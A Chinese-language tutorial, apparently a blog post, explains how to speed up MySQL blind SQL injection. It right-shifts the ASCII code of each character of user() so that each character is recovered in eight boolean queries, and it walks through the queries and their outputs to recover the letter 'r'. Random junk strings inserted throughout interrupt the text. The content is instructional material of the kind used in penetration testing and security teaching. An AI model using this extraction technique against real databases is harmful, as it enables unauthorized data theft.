关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位


7 q- P) H' }) n8 b7 H
下面将以查询mysql数据库当中user()的第一位为例:
: c6 g& |' ~; C! s2 U, r: _9 u
! M# ]% k% Y% a7 m$ \

ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)
$ K7 |8 e/ ]" b: E

5 S! q! q& F% `" j7 n' z
+ [5 O0 ]7 N& g. m2 u* i首先执行如下sql语句:
& g5 O! L0 L  A6 k- I6 ^7 q" F
6 c1 w2 k% J: d" {/ Y; e

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;



我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
) Q0 c3 `& p1 V1 G! {: u' G! F


- m+ n' |/ \6 B4 {) |1 h' B8 y# K: N9 M第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1
. T, {( n) y/ y* Y


- D6 U0 V% d$ J8 v如果运算结果为1,说明第一位为0,不为1
, d& L/ T( ^9 Z, J

; S. n% d8 Z8 k. t8 @) Z
$ K3 D! D$ ^" m! b+————————————–+
1 K, p: c) P8 B2 q5 i+ M$ D, n
| (ascii((substr(user(),1,1))) >> 7)=0 |
& r- N6 b: T6 A6 W7 F+ _9 u
. G1 `8 Q) p" [4 T( `) ]: }* w, ]+————————————–+
- b* j4 m' {3 [, {" S
| 1 |

, {: d& V( a) ^5 q, v+————————————–+

$ T+ k' U7 m6 {* M+ G1 row in set (0.00 sec)

这样我们就确定这个8bit的ascii的第一位为0

& ?+ s; }; E9 U# s4 v

( y0 |  {2 a, z: u# I第二次我们来做6次右偏移来确定前两位



* [# z9 l. y& b! E! u6 B/ F3 b$ ?前两位可能是01或00,即依然可以与0做比较,

2 G: h4 g- ?- y! [* B0 T. O# l7 Xmysql> select (ascii((substr(user(),1,1))) >> 6)=0;

+————————————–+

| (ascii((substr(user(),1,1))) >> 6)=0 |

: X& h8 @# m! A5 y5 V; I+————————————–+

| 0 |

1 |9 t' F3 k9 C5 O7 p- }8 {& G+————————————–+
6 J* i' f8 w0 _! p
% }9 d. v! `* ?7 t1 row in set (0.00 sec)
5 b% i, J7 B( e# E
8 x' }  s/ o5 ?  ]! m, {

结果为0,即第二位为1

) k2 T. j/ p4 d; W( W0 V
" H7 U3 G; I6 C0 ?9 t+ p$ V
开始猜测前三位为010或011

( |) ^% {% H! c! r' X: V  L, e% }4 D
! ]: U9 U( ]3 y+ E5 i
* E- [& _8 M+ F1 X* |) i) f# S让我们看看010和011的ascii码是多少



0 \2 {: q" J8 r+ Q/ Y分别查询select b’011′ select b’010′



获得结果 010 = 2 011 = 3

8 H4 U# G! m8 m) D" H4 C# l) b1 ?5 g
9 [7 h2 w. L7 T
执行如下sql:

7 v' m; P8 Z4 R9 t9 ^0 v6 G
. O% H' C  F5 r" Y
mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
$ {7 I- S4 ~+ |6 c  u
1 ?. X, g: l* }& D4 g+————————————–+
* e) r, }% @" Q! P
| (ascii((substr(user(),1,1))) >> 5)=2 |

5 o' O4 G  g0 B8 w8 |( p+————————————–+

  m6 R  ^3 M7 i* K8 Q. ~: L| 0 |

/ }( @* P0 Q* r1 u* {/ P+————————————–+
6 @- q; D+ l) h! P% P( G
! W. O. K8 l% U即前三位不为010,而是011

5 }* a! N# F1 S$ W: @" M
0 R( b3 ~7 x% K7 b
直到获得最后一位
0 H4 m/ l; U2 y8 z
1 s+ Y% ]2 O# ^! u2 ^6 i* D3 I( G

最终结果为:01110010
+ |# D0 ^0 }8 w( j
+ b" T' [& S& x- x# r
! ~1 `- Y% E# h0 Y& h" l9 y& W
转换一下:

& q* x7 Q1 e- p, }" b- w3 C5 R
* D7 i# z( o% D- Y' N$ W
/ s" O, ^. j, P  u2 K- d/ g& dselect b’01110010′
: _; t4 d% n& x! p) e7 x5 e$ r

& \" ?. m/ ~3 o1 v! n9 @5 v
查询结果

0 I- }3 I, x# ?
' i: D; D. b4 ~5 K# O
9 Y! l, b' Q* s# E2 D% G4 B& w" [+————-+
6 G- X% d2 J& h3 E2 F( K
| b’01110010′ |

$ P  C, ~' u; Q7 Y- O0 D% q+————-+

' _6 Z* z) \1 H1 W, \" w7 i| r |
( v4 ~) K0 g; N* R" Y. d
+————-+

1 row in set (0.00 sec)

5 f$ @& j/ }; j$ y0 n' p" g

9 \$ V7 D3 k5 ^4 d6 y: K" u这样我们就获得了user()的第一位.其它位依此类推

0 e1 C4 p3 x+ {2 N$ w# Z8 g* ^